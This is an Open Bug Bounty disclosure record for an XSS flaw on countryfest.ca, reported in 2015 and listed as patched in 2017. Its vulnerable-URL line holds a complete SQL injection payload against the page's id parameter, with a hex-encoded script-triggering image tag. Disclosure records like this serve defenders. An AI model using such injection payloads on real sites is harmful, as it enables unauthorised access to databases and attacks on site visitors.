countryfest.ca XSS vulnerability

2015-08-16T21:31:00
ID OBB:79639
Type openbugbounty
Reporter WhitePacket
Modified 2017-07-25T14:00:00

Description

Vulnerable URL:
http://countryfest.ca/page.php?id=72 AND (SELECT 5811 FROM(SELECT COUNT(*),CONCAT(0x3c696d67207372633d78206f6e6572726f723d70726f6d7074282f585353504f5345442f293e,(SELECT (ELT(5811=5811,1))),0x71787a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Details:

Description| Value
---|---
Patched:| Yes, at 25.07.2017
Latest check for patch:| 25.07.2017 14:00 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 1943369
Google Pagerank| 5
VIP website status:| No
Check countryfest.ca SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 16 August, 2015 21:31 GMT
Vulnerability existence verified and confirmed| 16 August, 2015 21:33 GMT
Vulnerability patched by the website owner| 25 July, 2017 14:00 GMT